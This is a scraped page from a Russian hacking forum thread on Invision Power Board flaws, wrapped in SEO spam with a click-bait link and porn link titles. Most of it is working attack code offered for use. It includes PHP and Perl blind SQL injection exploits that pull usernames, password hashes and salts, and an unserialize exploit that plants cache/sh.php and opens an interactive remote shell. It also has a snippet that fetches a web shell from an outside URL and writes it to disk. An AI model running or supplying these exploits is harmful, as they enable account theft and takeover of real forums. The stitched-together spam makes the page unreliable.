Worship Powered By Ipb
⚡ ALL INFORMATION CLICK HERE 👈🏻👈🏻👈🏻
Worship Powered By Ipb
Home
Forums
Members
Recent Posts
Menu
Log in
Page 3 of 5
< Prev
1
2
3
4
5
Next >
Joined:
7 Jun 2008
Messages:
3
Likes Received:
5
Reputations:
1
-------------------------------------------------------------
public function searchResults()
{
/* Search Term */
$search_term = str_replace( """, '"', urldecode( $this->request['search_term'] ) );
$search_term = str_replace( "&", '&', $search_term );
...
/* Count the number of results */
$total_results = $this->search_plugin->getSearchCount( $search_term, ', $content_titles_only );
-------------------------------------------------------------
forum/index.php?app=core&module=search&do=quick_search&search_filter_app[forums]=
-------------------------------------------------------------
public function getSearchCount( $search_term, $group_by='', $content_title_only=false ) {
...
{
/* Query the count */
$this->DB->build( array(
'select' => 'COUNT(*) as total_results',
'from' => array( 'posts' => 'p' ),
'where' => $this->_buildWhereStatement( $search_term,
$content_title_only ),
'group' => $group_by,
'add_join' => array(
...
$this->DB->execute();
-------------------------------------------------------------
From "admin/applications/core/modules_public/global/lostpass.php" line ~430
-------------------------------------------------------------
public function lostPasswordValidateForm( $msg='' ) {
...
if( $this->request['uid'] AND $this->request['aid'] )
{
$in_user_id = intval( trim( urldecode( $this->request['uid'] ) ) );
$in_validate_key = trim( urldecode( $this->request['aid'] ) );
$in_type = trim( $this->request['type'] );
...
if (! IPSText::md5Clean( $in_validate_key ) )
{
$this->registry->output->showError( 'validation_key_incorrect', 10113 );
}
if (! preg_match( "/^(?:\d){1,}$/", $in_user_id ) )
{
$this->registry->output->showError( 'uid_key_incorrect', 10114 );
}
/* Attempt to get the profile of the requesting user */
$member = IPSMember::load( $in_user_id );
if( ! $member['member_id'] )
{
$this->registry->output->showError( 'lostpass_no_member', 10115 );
}
/* Get validating info.. */
$validate = $this->DB->buildAndFetch( array( 'select' => '*', 'from' => 'validating',
'where' => "member_id={$in_user_id} and vid='{$in_validate_key}'
and lost_pass=1" ) );
-------------------------------------------------------------
-------------------------------------------------------------
static public function md5Clean( $text ) {
return preg_replace( "/[^a-zA-Z0-9]/", "" , substr( $text, 0, 32 ) ); }
-------------------------------------------------------------
Joined:
6 Apr 2010
Messages:
11
Likes Received:
1
Reputations:
5
Attention!\n";
echo "\n";
echo "\n";
echo "This exploit is meant to be used as php CLI script!\n";
echo "More information:\n";
echo "http://www.google.com/search?hl=en&q=php+cli+windows\n";
echo "This script will not run through a webserver.\n";
echo "\n";
exit;
}
//=====================================================================
// Print the awesome de.crypt.in logo
//=====================================================================
echo "\n _ _ _ ";
echo "\n __| | ___ ___ _ __ _ _ _ __ | |_ (_)_ __ ";
echo "\n / _` |/ _ \ / __| '__| | | | '_ \| __| | | '_ \ ";
echo "\n| (_| | __/| (__| | | |_| | |_) | |_ _| | | | |";
echo "\n \__,_|\___(_)___|_| \__, | .__/ \__(_)_|_| |_|";
echo "\n |___/|_| \n\n";
//=====================================================================
// Check if all command line arguments were passed
//=====================================================================
if(!isset($argv[1])||!isset($argv[2])||!isset($argv[3])){
echo "Usage: php ".$_SERVER['PHP_SELF']." [login] [password]\n";
echo "\n";
echo "NOTE: Login and password are optional, use for forums that require registration.\n";
echo "Options: 1 - Fetch username, 2 - Fetch password hash\n\n";
echo "Example: php ".$_SERVER['PHP_SELF']." http://ipb.com/board/ 1 1 foo bar\n";
die;
}
//=====================================================================
// Set some important variables...
//=====================================================================
$topicname = '';
$url = $argv[1];
$chosen_id = $argv[2];
$ch_option = $argv[3];
if(isset($argv[4])){
if(isset($argv[5])){
$user_login = $argv[4];
$user_pass = $argv[5];
}
else{
echo "Error: Password not specified with username\n";
die;
}
}
# Proxy settings
# Be sure to use proxy
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipb_log.txt'; //Log file
if(!extension_loaded('curl'))
{
if(!dl('php_curl.dll'))
{
die("Curl extension not loaded!\n Fatal exit ...\n");
}
else
{
echo "Curl loading success\n";
}
}
//=====================================================================
xecho("Target: $url\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("==========================================");
add_line("Target: $url");
if(isset($argv[4])){
login_to_forum($argv[4], $argv[5]);
}
$i = $chosen_id;
echo "Fetching topics from ID $i\n";
if(!fetch_target_id($i))
{
echo "No topics found.\n";
fwrite(STDOUT, "Last ditch effort, enter topic: ");
$topicname = trim(fgets(STDIN));
}
else echo "Topic found! Hacktime.\n";
// Check chosen option and proceed accordingly
add_line("------------------------------------------");
if($ch_option == 2){
$hash = get_hash($i);
$salt = get_salt($i);
$line = "$i:$hash:$salt";
add_line($line);
xecho("\n------------------------------------------\n");
xecho("User ID: $i\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");
}
else if($ch_option == 1){
$uname = get_user($i);
$line = "The username for id $i is $uname";
add_line($line);
xecho("$uname");
}
xecho("\nQuestions and feedback - http://de.crypt.in/ \n");
die(" \n");
//////////////////////////////////////////////////////////////////////
function login_to_forum($user, $pass)
{
global $url;
$post = 'app=core&module=global§ion=login&do=process&username='.$user.'&password='.$pass.'&rememberMe=1';
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff,'The login was successful!')>0){
xecho("Logged in.\n");
}
else{
xecho("Error: Unable to login.");
die;
}
}
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
global $url;
$post = 'app=core&module=search§ion=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%5Ball%5D=1&content_title_only=1&search_term=test%2527';
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff,'Moved Permanently')>0)
{
die('Ivalid. Try adding trailing slash to url. Exiting ...');
}
if(strpos($buff,'No results found for')>0)
{
die('Target is patched? Exiting ...');
}
}
//////////////////////////////////////////////////////////////////////
function fetch_target_id($id)
{
global $url, $topicname;
$post = 'app=core&module=search&do=user_posts&mid='.$id.'&view_by_title=1&search_filter_app%5Bforums%5D=1';
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff,'View result')>0){
$location = strpos($buff,'View result');
$start = strpos($buff,'>',$location)+1;
$end = strpos($buff,'',$start);
$topicname = substr($buff,$start,($end-$start));
return true;
}
else return false;
}
///////////////////////////////////////////////////////////////////////
function get_salt($id)
{
$len = 5;
$out = '';
xecho("Finding salt ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_saltchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current salt: $out \n");
}
xecho("\nFinal salt for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos, $id)
{
global $prefix;
$char = '';
$min = 32;
$max = 128;
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_salt,'.$pos.',1))';
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash($id)
{
$len = 32;
$out = '';
xecho("Finding hash ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
}
xecho("\nFinal hash for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos, $id)
{
global $prefix;
$char = '';
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.members_pass_hash,'.$pos.',1))';
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_user($id)
{
$len = 32;
$out = '';
xecho("Finding username ...\n");
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_userchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current username: $out \n");
}
xecho("\nFinal username for ID $id: $out\n\n");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_userchar($pos, $id)
{
global $prefix;
$char = '';
$pattern = 'm.member_id='.$id.' AND ORD(SUBSTR(m.name,'.$pos.',1))';
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
if($letter)
{
$min = 65;
$max = 122;
xecho("Char to find is [a-f]\n");
}
else
{
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
xecho("Current test: $curr-$max-$min\n");
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url;
global $topicname;
$bret = false;
$maxtry = 10;
$try = 1;
$pattern = 'app=core&module=search§ion=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%%5Ball%%5D=1&content_title_only=1&search_term='.$topicname.'%%2527 IN BOOLEAN MODE) AND %s AND MATCH(t.title) AGAINST(%%2527'.$topicname;
$post = sprintf($pattern, $p);
while(1)
{
$buff = trim(make_post($url, $post, '', $url));
if(strpos($buff,'Your search for the term ')>0)
{
$bret = true;
break;
}
elseif(strpos($buff,'No results found for')>0)
{
break;
}
elseif(strpos($buff, 'Driver Error') !== false)
{
die("Sql error! Wrong prefix?\nExiting ... ");
}
else
{
xecho("test_condition() - try $try - invalid return value ...\n");
xecho("Will wait 30 seconds for flood control. Expect 2-3 tries.\n");
xecho("This is going to take years...\n");
sleep(10);
$try ++;
if($try > $maxtry)
{
die("Too many tries - exiting ...\n");
}
else
{
xecho("Trying again - try $try ...\n");
}
}
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 ');
curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt ($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
if(!empty($GLOBALS['proxy_ip_port']))
{
curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
if(!empty($GLOBALS['proxy_user_password']))
{
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
}
}
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
global $outfile;
$line .= "\r\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
if($GLOBALS['cli'])
{
echo "$line";
}
else
{
$line = nl2br(htmlspecialchars($line));
echo "$line";
}
}
///////////////////////////////////////////////////////////////////////
?>
Last edited by a moderator: 12 Nov 2010
Joined:
3 Apr 2011
Messages:
10
Likes Received:
4
Reputations:
0
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
## tested on version 1 Final and version 3.1.4
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb3.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 3.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO :: Socket ;
if (@ ARGV < 4 ) { & usage ; }
$server = $ARGV [ 0 ];
$path = $ARGV [ 1 ];
$member_id = $ARGV [ 2 ];
$target = $ARGV [ 3 ];
$pass = ( $target )?( 'member_login_key' ):( 'password' );
$server =~ s !( http :\/\/)!!;
$request = 'http://' ;
$request .= $server ;
$request .= $path ;
$s_num = 1 ;
$|++;
$n = 0 ;
print "[~] SERVER : $server \r\n" ;
print "[~] PATH : $path \r\n" ;
print "[~] MEMBER ID : $member_id \r\n" ;
print "[~] TARGET : $target " ;
print (( $target )?( ' - IPB 3.*' ):( ' - IPB 2.*' ):( ' - IPB 1.*' ));
print "\r\n" ;
print "[~] SEARCHING PASSWORD ... [|]" ;
( $cmember_id = $member_id ) =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ;
while( 1 )
{
if(& found ( 47 , 58 )== 0 ) { & found ( 96 , 122 ); }
$char = $i ;
if ( $char == "0" )
{
if( length ( $allchar ) > 0 ){
print qq {\ b \ b DONE ]
MEMBER ID : $member_id
};
print (( $target )?( 'MEMBER_LOGIN_KEY : ' ):( 'PASSWORD : ' ));
print $allchar . "\r\n" ;
}
else
{
print "\b\b FAILED ]" ;
}
exit();
}
else
{
$allchar .= chr ( 42 );
}
$s_num ++;
}
sub found ($$)
{
my $fmin = $_ [ 0 ];
my $fmax = $_ [ 1 ];
if (( $fmax - $fmin )< 5 ) { $i = crack ( $fmin , $fmax ); return $i ; }
$r = int ( $fmax - ( $fmax - $fmin )/ 2 );
$check = " BETWEEN $r AND $fmax " ;
if ( & check ( $check ) ) { & found ( $r , $fmax ); }
else { & found ( $fmin , $r ); }
}
sub crack ($$)
{
my $cmin = $_ [ 0 ];
my $cmax = $_ [ 1 ];
$i = $cmin ;
while ( $i < $cmax )
{
$crcheck = "= $i " ;
if ( & check ( $crcheck ) ) { return $i ; }
$i ++;
}
$i = 0 ;
return $i ;
}
sub check ($)
{
$n ++;
status ();
$ccheck = $_ [ 0 ];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D" ;
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28" ;
$pass_hash3 = $pass . "," . $s_num . ",1))" . $ccheck . ") /*" ;
$pass_hash3 =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20" ;
$socket = IO :: Socket :: INET -> new ( Proto => "tcp" , PeerAddr => " $server " , PeerPort => "80" );
printf $socket ( "GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n" ,
$path , $server , $cmember_id , $pass_hash1 , $cmember_id , $pass_hash2 , $pass_hash3 , $nmalykh );
while(< $socket >)
{
if (/ Set - Cookie : session_id = 0 ;/) { return 1 ; }
}
return 0 ;
}
sub status ()
{
$status = $n % 5 ;
if( $status == 0 ){ print "\b\b/]" ; }
if( $status == 1 ){ print "\b\b-]" ; }
if( $status == 2 ){ print "\b\b\\]" ; }
if( $status == 3 ){ print "\b\b|]" ; }
}
sub usage ()
{
print q (
Invision Power Board v < 3.1.4 SQL injection exploit
----------------------------------------------------
USAGE :
~~~~~~
r57ipb3 . pl [ server ] [/ folder /] [ member_id ] [ target ]
[ server ] - host where IPB installed
[/ folder /] - folder where IPB installed
[ member_id ] - user id for brute
targets :
0 - IPB 1. *
1 - IPB 2. *
2 - IPB 3. * ( Prior To 3.1.4 )
e . g . r57ipb3 . pl 127.0.0.1 / IPB / 1 1
----------------------------------------------------
( c ) oded by 1dt . w0lf
RST / GHC , http : //rst.void.ru , http://ghc.ru
);
exit();
}
Joined:
19 Dec 2006
Messages:
115
Likes Received:
28
Reputations:
-4
;url=javascript:alert('Fuck off');" HTTP-EQUIV="refresh
Joined:
13 Feb 2010
Messages:
69
Likes Received:
5
Reputations:
9
Joined:
9 Mar 2011
Messages:
28
Likes Received:
2
Reputations:
0
Joined:
9 Nov 2009
Messages:
1,160
Likes Received:
424
Reputations:
231
Joined:
23 Dec 2009
Messages:
236
Likes Received:
163
Reputations:
77
Какие таблицы в БД могут быть у Ipb?
Joined:
1 Dec 2011
Messages:
565
Likes Received:
375
Reputations:
267
$a = file_get_contents ( http : //site/shell.txt); //ваш адрес шелла
$b = '/path/to/writeable/dir/' ; //папка доступная для записи
$c = fopen ( $br . 'shell.php' , "w" );
fwrite ( $c , $a );
fclose ( $c );
Joined:
16 Jul 2010
Messages:
1,037
Likes Received:
531
Reputations:
935
$a = file_get_contents ( http : //site/shell.txt); //ваш адрес шелла
$b = '/path/to/writeable/dir/' ; //папка доступная для записи
$c = fopen ( $br . 'shell.php' , "w" );
fwrite ( $c , $a );
fclose ( $c );
_________________________ http://devel.wtf/ - Revers IP lookup
Joined:
2 Feb 2011
Messages:
728
Likes Received:
26
Reputations:
-6
\n" ;
print "\nExample....: php $argv [ 0 ] localhost /" ;
print "\nExample....: php $argv [ 0 ] localhost /ipb/\n" ;
die();
}
list( $host , $path ) = array( $argv [ 1 ], $argv [ 2 ]);
$packet = "GET { $path } index.php HTTP/1.0\r\n" ;
$packet .= "Host: { $host } \r\n" ;
$packet .= "Connection: close\r\n\r\n" ;
$_prefix = preg_match ( '/Cookie: (.+)session/' , http_send ( $host , $packet ), $m ) ? $m [ 1 ] : '' ;
class db_driver_mysql
{
public $obj = array( 'use_debug_log' => 1 , 'debug_log' => 'cache/sh.php' );
}
# Super bypass by @i0n1c
$payload = urlencode ( 'a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}' );
$phpcode = '' ;
$packet = "GET { $path } index.php? { $phpcode } HTTP/1.0\r\n" ;
$packet .= "Host: { $host } \r\n" ;
$packet .= "Cookie: { $_prefix } member_id= { $payload } \r\n" ;
$packet .= "Connection: close\r\n\r\n" ;
http_send ( $host , $packet );
$packet = "GET { $path } cache/sh.php HTTP/1.0\r\n" ;
$packet .= "Host: { $host } \r\n" ;
$packet .= "Cmd: %s\r\n" ;
$packet .= "Connection: close\r\n\r\n" ;
if ( preg_match ( '/<\?error/' , http_send ( $host , $packet ))) die( "\n[-] short_open_tag disabled!\n" );
while( 1 )
{
print "\nipb-shell# " ;
if (( $cmd = trim ( fgets ( STDIN ))) == "exit" ) break;
$response = http_send ( $host , sprintf ( $packet , base64_encode ( $cmd )));
preg_match ( '/___(.*)/s' , $response , $m ) ? print $m [ 1 ] : die( "\n[-] Exploit failed!\n" );
}
?>
Joined:
16 Jul 2010
Messages:
1,037
Likes Received:
531
Reputations:
935
Invision Power Board <= 3.3.4 unserialize Regex Bypass
_________________________ http://devel.wtf/ - Revers IP lookup
Joined:
2 Sep 2006
Messages:
170
Likes Received:
100
Reputations:
32
Joined:
19 Feb 2010
Messages:
4
Likes Received:
2
Reputations:
5
Joined:
15 Feb 2006
Messages:
48
Likes Received:
28
Reputations:
0
Last edited by a moderator: 26 Dec 2012
Page 3 of 5
< Prev
1
2
3
4
5
Next >
Language
English (US)
ANTICHAT ™ © 2001-2027 Antichat Kft.
Home
Contact Us
Help
Terms and Rules
Privacy Policy
Top
IPB : International Praise Band - Posts | Facebook
Форумы - [Обзор уязвимостей IPB ] | Page 3 | ANTICHAT - Security online...
LIVE WORSHIP | Epi 861 | 03 APR 2019 | Feel the power of live... - YouTube
Free Open Source Church Worship Presentation Software | OpenLP
EasyWorship Software
Realitykings Monster
Bbw Outdoor Sex
Solo Porn Girl Video Big Tits
Https Ru Xhamster Com Movies
Private Video Record
